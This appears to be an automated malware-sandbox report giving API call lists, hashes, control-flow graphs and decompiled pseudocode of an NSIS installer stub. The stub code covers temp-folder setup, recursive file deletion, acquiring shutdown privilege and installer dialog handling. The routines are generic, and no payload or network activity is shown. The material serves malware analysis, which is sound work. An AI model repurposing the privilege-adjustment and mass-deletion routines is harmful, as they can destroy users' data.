                                                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
                                                        • OleInitialize.OLE32(00000000), ref: 00403783
                                                        • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
                                                        • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
                                                        • CharNextW.USER32(00000000), ref: 004037EF
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403922
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
                                                        • lstrcatW.KERNEL32 ref: 0040393F
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403953
                                                        • lstrcatW.KERNEL32 ref: 0040395B
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403988
                                                        • lstrcatW.KERNEL32 ref: 00403A6F
                                                        • lstrcatW.KERNEL32 ref: 00403A7E
                                                          • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                                                        • lstrcatW.KERNEL32 ref: 00403A89
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403A95
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
                                                        • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
                                                        • CopyFileW.KERNEL32 ref: 00403B27
                                                        • CloseHandle.KERNEL32(00000000), ref: 00403B54
                                                        • ExitProcess.KERNELBASE(?), ref: 00403B72
                                                        • OleUninitialize.OLE32 ref: 00403B77
                                                        • ExitProcess.KERNEL32 ref: 00403B91
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C04
                                                        • ExitProcess.KERNEL32 ref: 00403C25
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                        • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                        • API String ID: 2292928366-4036104658
                                                        • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                                                        • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
                                                        • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                                                        • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 391 405d7a-405da0 call 406045 394 405da2-405db4 DeleteFileW 391->394 395 405db9-405dc0 391->395 396 405f36-405f3a 394->396 397 405dc2-405dc4 395->397 398 405dd3-405de3 call 40666e 395->398 400 405ee4-405ee9 397->400 401 405dca-405dcd 397->401 404 405df2-405df3 call 405f89 398->404 405 405de5-405df0 lstrcatW 398->405 400->396 403 405eeb-405eee 400->403 401->398 401->400 406 405ef0-405ef6 403->406 407 405ef8-405f00 call 4069a4 403->407 408 405df8-405dfc 404->408 405->408 406->396 407->396 415 405f02-405f16 call 405f3d call 405d32 407->415 411 405e08-405e0e lstrcatW 408->411 412 405dfe-405e06 408->412 414 405e13-405e2f lstrlenW FindFirstFileW 411->414 412->411 412->414 416 405e35-405e3d 414->416 417 405ed9-405edd 414->417 433 405f18-405f1b 415->433 434 405f2e-405f31 call 4056d0 415->434 420 405e5d-405e71 call 40666e 416->420 421 405e3f-405e47 416->421 417->400 419 405edf 417->419 419->400 431 405e73-405e7b 420->431 432 405e88-405e93 call 405d32 420->432 423 405e49-405e51 421->423 424 405ebc-405ecc FindNextFileW 421->424 423->420 428 405e53-405e5b 423->428 424->416 427 405ed2-405ed3 FindClose 424->427 427->417 428->420 428->424 431->424 436 405e7d-405e86 call 405d7a 431->436 444 405eb4-405eb7 call 4056d0 432->444 445 405e95-405e98 432->445 433->406 435 405f1d-405f2c call 4056d0 call 40642e 433->435 434->396 435->396 436->424 444->424 447 405e9a-405eaa call 4056d0 call 40642e 445->447 448 405eac-405eb2 445->448 447->424 448->424
                                                        C-Code - Quality: 98%
                                                        			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				short _v556;
                                                        				short _v558;
                                                        				struct _WIN32_FIND_DATAW _v604;
                                                        				signed int _t38;
                                                        				signed int _t52;
                                                        				signed int _t55;
                                                        				signed int _t62;
                                                        				void* _t64;
                                                        				signed char _t65;
                                                        				WCHAR* _t66;
                                                        				void* _t67;
                                                        				WCHAR* _t68;
                                                        				void* _t70;
                                                        
                                                        				_t65 = _a8;
                                                        				_t68 = _a4;
                                                        				_v8 = _t65 & 0x00000004;
                                                        				_t38 = E00406045(__eflags, _t68);
                                                        				_v12 = _t38;
                                                        				if((_t65 & 0x00000008) != 0) {
                                                        					_t62 = DeleteFileW(_t68); // executed
                                                        					asm("sbb eax, eax");
                                                        					_t64 =  ~_t62 + 1;
                                                        					 *0x7a8b28 =  *0x7a8b28 + _t64;
                                                        					return _t64;
                                                        				}
                                                        				_a4 = _t65;
                                                        				_t8 =  &_a4;
                                                        				 *_t8 = _a4 & 0x00000001;
                                                        				__eflags =  *_t8;
                                                        				if( *_t8 == 0) {
                                                        					L5:
                                                        					E0040666E(0x7a3f90, _t68);
                                                        					__eflags = _a4;
                                                        					if(_a4 == 0) {
                                                        						E00405F89(_t68);
                                                        					} else {
                                                        						lstrcatW(0x7a3f90, L"\\*.*");
                                                        					}
                                                        					__eflags =  *_t68;
                                                        					if( *_t68 != 0) {
                                                        						L10:
                                                        						lstrcatW(_t68, 0x40a014);
                                                        						L11:
                                                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                        						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
                                                        						_t70 = _t38;
                                                        						__eflags = _t70 - 0xffffffff;
                                                        						if(_t70 == 0xffffffff) {
                                                        							L26:
                                                        							__eflags = _a4;
                                                        							if(_a4 != 0) {
                                                        								_t30 = _t66 - 2;
                                                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                        								__eflags =  *_t30;
                                                        							}
                                                        							goto L28;
                                                        						} else {
                                                        							goto L12;
                                                        						}
                                                        						do {
                                                        							L12:
                                                        							__eflags = _v604.cFileName - 0x2e;
                                                        							if(_v604.cFileName != 0x2e) {
                                                        								L16:
                                                        								E0040666E(_t66,  &(_v604.cFileName));
                                                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                        								if(__eflags == 0) {
                                                        									_t52 = E00405D32(__eflags, _t68, _v8);
                                                        									__eflags = _t52;
                                                        									if(_t52 != 0) {
                                                        										E004056D0(0xfffffff2, _t68);
                                                        									} else {
                                                        										__eflags = _v8 - _t52;
                                                        										if(_v8 == _t52) {
                                                        											 *0x7a8b28 =  *0x7a8b28 + 1;
                                                        										} else {
                                                        											E004056D0(0xfffffff1, _t68);
                                                        											E0040642E(_t67, _t68, 0);
                                                        										}
                                                        									}
                                                        								} else {
                                                        									__eflags = (_a8 & 0x00000003) - 3;
                                                        									if(__eflags == 0) {
                                                        										E00405D7A(__eflags, _t68, _a8);
                                                        									}
                                                        								}
                                                        								goto L24;
                                                        							}
                                                        							__eflags = _v558;
                                                        							if(_v558 == 0) {
                                                        								goto L24;
                                                        							}
                                                        							__eflags = _v558 - 0x2e;
                                                        							if(_v558 != 0x2e) {
                                                        								goto L16;
                                                        							}
                                                        							__eflags = _v556;
                                                        							if(_v556 == 0) {
                                                        								goto L24;
                                                        							}
                                                        							goto L16;
                                                        							L24:
                                                        							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                                        							__eflags = _t55;
                                                        						} while (_t55 != 0);
                                                        						_t38 = FindClose(_t70); // executed
                                                        						goto L26;
                                                        					}
                                                        					__eflags =  *0x7a3f90 - 0x5c;
                                                        					if( *0x7a3f90 != 0x5c) {
                                                        						goto L11;
                                                        					}
                                                        					goto L10;
                                                        				} else {
                                                        					__eflags = _t38;
                                                        					if(_t38 == 0) {
                                                        						L28:
                                                        						__eflags = _a4;
                                                        						if(_a4 == 0) {
                                                        							L36:
                                                        							return _t38;
                                                        						}
                                                        						__eflags = _v12;
                                                        						if(_v12 != 0) {
                                                        							_t38 = E004069A4(_t68);
                                                        							__eflags = _t38;
                                                        							if(_t38 == 0) {
                                                        								goto L36;
                                                        							}
                                                        							E00405F3D(_t68);
                                                        							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
                                                        							__eflags = _t38;
                                                        							if(_t38 != 0) {
                                                        								return E004056D0(0xffffffe5, _t68);
                                                        							}
                                                        							__eflags = _v8;
                                                        							if(_v8 == 0) {
                                                        								goto L30;
                                                        							}
                                                        							E004056D0(0xfffffff1, _t68);
                                                        							return E0040642E(_t67, _t68, 0);
                                                        						}
                                                        						L30:
                                                        						 *0x7a8b28 =  *0x7a8b28 + 1;
                                                        						return _t38;
                                                        					}
                                                        					__eflags = _t65 & 0x00000002;
                                                        					if((_t65 & 0x00000002) == 0) {
                                                        						goto L28;
                                                        					}
                                                        					goto L5;
                                                        				}
                                                        			}

                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405DA3
                                                        • lstrcatW.KERNEL32 ref: 00405DEB
                                                        • lstrcatW.KERNEL32 ref: 00405E0E
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E14
                                                        • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E24
                                                        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
                                                        • FindClose.KERNELBASE(00000000), ref: 00405ED3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: .$.$\*.*
                                                        • API String ID: 2035342205-3749113046
                                                        • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                                                        • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
                                                        • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                                                        • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004069A4(WCHAR* _a4) {
                                                        				void* _t2;
                                                        
                                                        				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
                                                        				if(_t2 == 0xffffffff) {
                                                        					return 0;
                                                        				}
                                                        				FindClose(_t2);
                                                        				return 0x7a4fd8;
                                                        			}

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(7556D4C4,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004069AF
                                                        • FindClose.KERNEL32(00000000), ref: 004069BB
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                                                        • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
                                                        • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                                                        • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 146 4040ef-4040f8 142->146 144 4042a2-4042b7 143->144 145 404255-40429d GetDlgItem * 2 call 4045ca SetClassLongW call 40140b 143->145 148 4042f7-4042fc call 404616 144->148 149 4042b9-4042bc 144->149 145->144 150 4040fa-404107 SetWindowPos 146->150 151 40410d-404114 146->151 165 404301-40431c 148->165 155 4042be-4042c9 call 401389 149->155 156 4042ef-4042f1 149->156 150->151 152 404116-404130 ShowWindow 151->152 153 404158-40415e 151->153 158 404231-40423f call 404631 152->158 159 404136-404149 GetWindowLongW 152->159 160 404160-404172 DestroyWindow 153->160 161 404177-40417a 153->161 155->156 181 4042cb-4042ea SendMessageW 155->181 156->148 164 404597 156->164 171 404599-4045a0 158->171 159->158 168 40414f-404152 ShowWindow 159->168 169 404574-40457a 160->169 172 40417c-404188 SetWindowLongW 161->172 173 40418d-404193 161->173 164->171 166 404325-40432b 165->166 167 40431e-404320 call 40140b 165->167 178 404331-40433c 166->178 179 404555-40456e DestroyWindow EndDialog 166->179 167->166 168->153 169->164 177 40457c-404582 169->177 172->171 173->158 180 404199-4041a8 GetDlgItem 173->180 177->164 183 404584-40458d ShowWindow 177->183 178->179 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 178->184 179->169 185 4041c7-4041ca 180->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 180->186 181->171 183->164 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->164 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->158 194 4041e7-4041ed 192->194 195 40421b-40422b SendMessageW 192->195 193->195 198 4041dc-4041de 193->198 199 404204-40420d call 40140b 194->199 200 4041ef-4041f5 call 40140b 194->200 195->158 198->191 199->158 210 40420f-404219 
199->210 209 4041fb 200->209 209->191 210->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->165 233 40446a-40446c 222->233 233->165 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->169 238 4044af-4044dc CreateDialogParamW 235->238 236->164 237 404484-40448a 236->237 237->165 239 404490 237->239 238->169 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->164 240->164 245 40453b-404553 ShowWindow call 404616 240->245 245->169
                                                        C-Code - Quality: 84%
                                                        			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                        				struct HWND__* _v28;
                                                        				void* _v84;
                                                        				void* _v88;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t34;
                                                        				signed int _t36;
                                                        				signed int _t38;
                                                        				struct HWND__* _t48;
                                                        				signed int _t67;
                                                        				struct HWND__* _t73;
                                                        				signed int _t86;
                                                        				struct HWND__* _t91;
                                                        				signed int _t99;
                                                        				int _t103;
                                                        				signed int _t117;
                                                        				int _t118;
                                                        				int _t122;
                                                        				signed int _t124;
                                                        				struct HWND__* _t127;
                                                        				struct HWND__* _t128;
                                                        				int _t129;
                                                        				intOrPtr _t130;
                                                        				long _t133;
                                                        				int _t135;
                                                        				int _t136;
                                                        				void* _t137;
                                                        
                                                        				_t130 = _a8;
                                                        				if(_t130 == 0x110 || _t130 == 0x408) {
                                                        					_t34 = _a12;
                                                        					_t127 = _a4;
                                                        					__eflags = _t130 - 0x110;
                                                        					 *0x7a1f70 = _t34;
                                                        					if(_t130 == 0x110) {
                                                        						 *0x7a8aa8 = _t127;
                                                        						 *0x7a1f84 = GetDlgItem(_t127, 1);
                                                        						_t91 = GetDlgItem(_t127, 2);
                                                        						_push(0xffffffff);
                                                        						_push(0x1c);
                                                        						 *0x79ff50 = _t91;
                                                        						E004045CA(_t127);
                                                        						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88);
                                                        						 *0x7a7a6c = E0040140B(4);
                                                        						_t34 = 1;
                                                        						__eflags = 1;
                                                        						 *0x7a1f70 = 1;
                                                        					}
                                                        					_t124 =  *0x40a39c; // 0x0
                                                        					_t136 = 0;
                                                        					_t133 = (_t124 << 6) +  *0x7a8ac0;
                                                        					__eflags = _t124;
                                                        					if(_t124 < 0) {
                                                        						L36:
                                                        						E00404616(0x40b);
                                                        						while(1) {
                                                        							_t36 =  *0x7a1f70;
                                                        							 *0x40a39c =  *0x40a39c + _t36;
                                                        							_t133 = _t133 + (_t36 << 6);
                                                        							_t38 =  *0x40a39c; // 0x0
                                                        							__eflags = _t38 -  *0x7a8ac4;
                                                        							if(_t38 ==  *0x7a8ac4) {
                                                        								E0040140B(1);
                                                        							}
                                                        							__eflags =  *0x7a7a6c - _t136;
                                                        							if( *0x7a7a6c != _t136) {
                                                        								break;
                                                        							}
                                                        							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
                                                        							if(__eflags >= 0) {
                                                        								break;
                                                        							}
                                                        							_t117 =  *(_t133 + 0x14);
                                                        							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                                                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                        							_push(0xfffffc19);
                                                        							E004045CA(_t127);
                                                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                        							_push(0xfffffc1b);
                                                        							E004045CA(_t127);
                                                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                        							_push(0xfffffc1a);
                                                        							E004045CA(_t127);
                                                        							_t48 = GetDlgItem(_t127, 3);
                                                        							__eflags =  *0x7a8b2c - _t136;
                                                        							_v28 = _t48;
                                                        							if( *0x7a8b2c != _t136) {
                                                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                        								__eflags = _t117;
                                                        							}
                                                        							ShowWindow(_t48, _t117 & 0x00000008);
                                                        							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                        							E004045EC(_t117 & 0x00000002);
                                                        							_t118 = _t117 & 0x00000004;
                                                        							EnableWindow( *0x79ff50, _t118);
                                                        							__eflags = _t118 - _t136;
                                                        							if(_t118 == _t136) {
                                                        								_push(1);
                                                        							} else {
                                                        								_push(_t136);
                                                        							}
                                                        							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                        							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                        							__eflags =  *0x7a8b2c - _t136;
                                                        							if( *0x7a8b2c == _t136) {
                                                        								_push( *0x7a1f84);
                                                        							} else {
                                                        								SendMessageW(_t127, 0x401, 2, _t136);
                                                        								_push( *0x79ff50);
                                                        							}
                                                        							E004045FF();
                                                        							E0040666E(0x7a1f88, E004040AC());
                                                        							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                        							SetWindowTextW(_t127, 0x7a1f88);
                                                        							_push(_t136);
                                                        							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                        							__eflags = _t67;
                                                        							if(_t67 != 0) {
                                                        								continue;
                                                        							} else {
                                                        								__eflags =  *_t133 - _t136;
                                                        								if( *_t133 == _t136) {
                                                        									continue;
                                                        								}
                                                        								__eflags =  *(_t133 + 4) - 5;
                                                        								if( *(_t133 + 4) != 5) {
                                                        									DestroyWindow( *0x7a7a78);
                                                        									 *0x7a0f60 = _t133;
                                                        									__eflags =  *_t133 - _t136;
                                                        									if( *_t133 <= _t136) {
                                                        										goto L60;
                                                        									}
                                                        									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                                        									__eflags = _t73 - _t136;
                                                        									 *0x7a7a78 = _t73;
                                                        									if(_t73 == _t136) {
                                                        										goto L60;
                                                        									}
                                                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                        									_push(6);
                                                        									E004045CA(_t73);
                                                        									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                        									ScreenToClient(_t127, _t137 + 0x10);
                                                        									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                        									_push(_t136);
                                                        									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                        									__eflags =  *0x7a7a6c - _t136;
                                                        									if( *0x7a7a6c != _t136) {
                                                        										goto L63;
                                                        									}
                                                        									ShowWindow( *0x7a7a78, 8);
                                                        									E00404616(0x405);
                                                        									goto L60;
                                                        								}
                                                        								__eflags =  *0x7a8b2c - _t136;
                                                        								if( *0x7a8b2c != _t136) {
                                                        									goto L63;
                                                        								}
                                                        								__eflags =  *0x7a8b20 - _t136;
                                                        								if( *0x7a8b20 != _t136) {
                                                        									continue;
                                                        								}
                                                        								goto L63;
                                                        							}
                                                        						}
                                                        						DestroyWindow( *0x7a7a78); // executed
                                                        						 *0x7a8aa8 = _t136;
                                                        						EndDialog(_t127,  *0x7a0758); // executed
                                                        						goto L60;
                                                        					} else {
                                                        						__eflags = _t34 - 1;
                                                        						if(_t34 != 1) {
                                                        							L35:
                                                        							__eflags =  *_t133 - _t136;
                                                        							if( *_t133 == _t136) {
                                                        								goto L63;
                                                        							}
                                                        							goto L36;
                                                        						}
                                                        						_push(0);
                                                        						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                        						__eflags = _t86;
                                                        						if(_t86 == 0) {
                                                        							goto L35;
                                                        						}
                                                        						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
                                                        						__eflags =  *0x7a7a6c;
                                                        						return 0 |  *0x7a7a6c == 0x00000000;
                                                        					}
                                                        				} else {
                                                        					_t127 = _a4;
                                                        					_t136 = 0;
                                                        					if(_t130 == 0x47) {
                                                        						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
                                                        					}
                                                        					_t122 = _a12;
                                                        					if(_t130 != 5) {
                                                        						L8:
                                                        						if(_t130 != 0x40d) {
                                                        							__eflags = _t130 - 0x11;
                                                        							if(_t130 != 0x11) {
                                                        								__eflags = _t130 - 0x111;
                                                        								if(_t130 != 0x111) {
                                                        									goto L28;
                                                        								}
                                                        								_t135 = _t122 & 0x0000ffff;
                                                        								_t128 = GetDlgItem(_t127, _t135);
                                                        								__eflags = _t128 - _t136;
                                                        								if(_t128 == _t136) {
                                                        									L15:
                                                        									__eflags = _t135 - 1;
                                                        									if(_t135 != 1) {
                                                        										__eflags = _t135 - 3;
                                                        										if(_t135 != 3) {
                                                        											_t129 = 2;
                                                        											__eflags = _t135 - _t129;
                                                        											if(_t135 != _t129) {
                                                        												L27:
                                                        												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
                                                        												goto L28;
                                                        											}
                                                        											__eflags =  *0x7a8b2c - _t136;
                                                        											if( *0x7a8b2c == _t136) {
                                                        												_t99 = E0040140B(3);
                                                        												__eflags = _t99;
                                                        												if(_t99 != 0) {
                                                        													goto L28;
                                                        												}
                                                        												 *0x7a0758 = 1;
                                                        												L23:
                                                        												_push(0x78);
                                                        												L24:
                                                        												E004045A3();
                                                        												goto L28;
                                                        											}
                                                        											E0040140B(_t129);
                                                        											 *0x7a0758 = _t129;
                                                        											goto L23;
                                                        										}
                                                        										__eflags =  *0x40a39c - _t136; // 0x0
                                                        										if(__eflags <= 0) {
                                                        											goto L27;
                                                        										}
                                                        										_push(0xffffffff);
                                                        										goto L24;
                                                        									}
                                                        									_push(_t135);
                                                        									goto L24;
                                                        								}
                                                        								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                        								_t103 = IsWindowEnabled(_t128);
                                                        								__eflags = _t103;
                                                        								if(_t103 == 0) {
                                                        									L63:
                                                        									return 0;
                                                        								}
                                                        								goto L15;
                                                        							}
